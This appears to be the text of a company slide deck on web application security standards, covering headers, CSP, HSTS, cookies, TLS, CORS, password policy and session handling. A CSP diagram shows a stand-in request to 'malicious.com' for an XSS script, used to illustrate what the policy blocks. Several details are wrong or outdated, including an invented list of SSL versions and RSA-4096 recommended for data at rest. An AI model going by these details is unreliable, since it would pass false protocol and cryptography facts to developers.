WEB APPLICATION SECURITY STANDARDS

It is much more secure to be feared than to be loved.

www.ideas2it.com

Security Headers

● Content-Security-Policy ○ Reduce XSS risks on modern browsers ● X-Content-Type-Options ○ Prevent browsers from trying to guess (“sniff”) the MIME type ● X-XSS-Protection ○ Stops pages from loading when they detect reflected cross-site scripting (XSS) ● X-Frame-Options ○ Prevent the site from clickjacking attacks

www.ideas2it.com

Security Headers

● Strict-Transport-Security ○ Lets a website tell browsers that it should only be accessed using HTTPS ● Referrer-Policy ○ Controls how much referrer information (sent via the Referer header) should be included with requests. ● Feature-policy ○ Provides a mechanism to allow and deny the use of browser features.

www.ideas2it.com

Request : digicontent.com/assets/css/styles.css

Request : digicontent.com/assets/js/filter.js

Request : malicious.com/assets/js/xss.js

Content-Security-Policy: default-src digicontent.com

Content Security Policy

Browser Asset

Sniff asset to determine MIME type

Based on content MIME type = HTML

MIME Sniffing

HSTS enabled Client origin server Request : http://digicontent.com

Response : https://digicontent.com

HTTP Strict Transport Security

Cross Site Scripting - XSS

● Stealing other user’s cookies ● Stealing their private information ● Performing actions on behalf of other users ● Redirecting to other websites ● Showing ads in hidden IFRAMES and pop-ups

www.ideas2it.com Cross Site Scripting (XSS)

Secure cache control settings

● Max-age ● No-cache ● No-store ● Public ● Private ● Must-Revalidate ● Proxy-Revalidate

www.ideas2it.com Request : digicontent.com/styles.css

digicontent.com/styles.css

Cache-Control : max-age = 3600

3600s Receive styles.css Store styles.css

Browser Cache

Cache-Control www.ideas2it.com

Cookie attributes

● HTTP-ONLY ● SECURE ● Domain ● SameSite (Strict/Lax/None) ● Path

www.ideas2it.com Cookie : Same Site Vulnerable TLS SSL vs. TLS ● SSL and TLS are both cryptographic protocols that provide authentication and data encryption between servers, machines, and applications.

SSL versions : TLS versions :

● SSL v1.0 ● TLS v1.0 ● SSL v1.1 ● TLS v1.1 ● SSL v1.2 ● TLS v1.2 ● SSL v1.3 ● TLS v1.3 www.ideas2it.com SSL Report

Recommended HTTP Methods

● GET and POST

Dilemma of using other HTTP Methods ● PUT and DELETE - Verb Tampering ● OPTIONS - Exposing other HTTP Methods supported by the Domain

● TRACE and TRACK - Grants XSS attacks

www.ideas2it.com

Server Information Disclosure

● Server Name ● Server Version

CORS Enablement

● Access-Control-Allow-Origin - restrictive to domains ● Not Advisable to use Cross Domains. Use if really needed.

www.ideas2it.com

Implement Robot.txt

● User-agent: * ● Disallow: /

Implement Subresource Integrity Support

● Generate SRI Hash value for third party API’s.

Eg.

www.ideas2it.com

Maven DB Credentials - Encryption

● Database Credentials should be kept in Encrypted format in POM XML ● Maven provides the feature to encrypt the credentials, guidelines below

https://maven.apache.org/guides/mini/guide-encryption.html

www.ideas2it.com

API Authentication

● Implement Token-Based Authentication such as OAUTH2

API Role Based Authorization

● Implement Role-Based Authorization for each API’s

www.ideas2it.com API Authentication and Authorization Flow

Client OAuth Filter Authorization Filter Server

Client sends the Request along with token Token successfully validated and sends to Authorization filter User successfully Invalid Token - Fails Authorized

Invalid user role - Fails

Server successfully sends back response to the Client

www.ideas2it.com

Password policy configuration

● Character Repetition (e.g., AAAAAbl$%) ● Keyboard Patterns both Horizontally/Vertically (e.g., QWERTY, QAZ) ● No Dictionary Words (e.g., Ideas) ● Maintain password history (last 24 passwords) ● Enforce change of password for every 75 days (30 days for Admin) ● Account Lockout

www.ideas2it.com

Session management

● New and Unique session identifier for each login ● Terminate on logout or browser close

Application Inactivity timeout

● Terminate the session after 20 minutes of inactivity ● Refresh Auth token for every 10 minutes

www.ideas2it.com Custom Error Page

Generate custom error page to avoid exposing the server information

www.ideas2it.com Exposing Hidden Directories/Files

Should not expose the hidden directories/files from Server (like .htaccess, .git, etc.,)

www.ideas2it.com Directory Listing

Do not use ‘Indexes’ inside directory attribute to avoid exposing the project structure.

www.ideas2it.com

Best Practices of a secured Application

● Use Standard Authentication protocol such as OAuth2 ● Do not transport Confidential Information in URL parameters ● Disable password Autocomplete ● Should not be Vulnerable to SQL Injections, use Prepared Statement or Query Parameter ● Error should be handled properly ● Inputs should be properly validated ● File uploads should be limited to extensions (do not support .bat, .exe, .sh, etc.,) ● Enable Audit Logs and rate limits ● Encrypt data at REST (Use Algorithms like RSA-4096, AES) ● Proper permission settings in Server

www.ideas2it.com Shoot Us !